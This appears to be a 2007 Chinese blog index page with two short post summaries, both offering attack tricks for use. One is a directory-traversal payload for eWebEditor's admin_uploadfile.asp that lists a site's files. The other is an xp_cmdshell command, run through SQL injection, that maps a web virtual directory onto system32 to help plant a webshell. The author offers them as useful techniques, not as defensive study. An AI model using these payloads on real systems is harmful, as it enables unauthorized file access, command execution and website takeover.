2007年11月4日
摘要: ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=http://www.cnblogs.com/../.. 看到整个网站文件了 阅读全文
posted @ 2007-11-04 21:50 %5C 阅读(1122) 评论(1) 推荐(0) 编辑
摘要: 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目... 阅读全文
posted @ 2007-11-04 18:52 %5C 阅读(590) 评论(0) 推荐(0) 编辑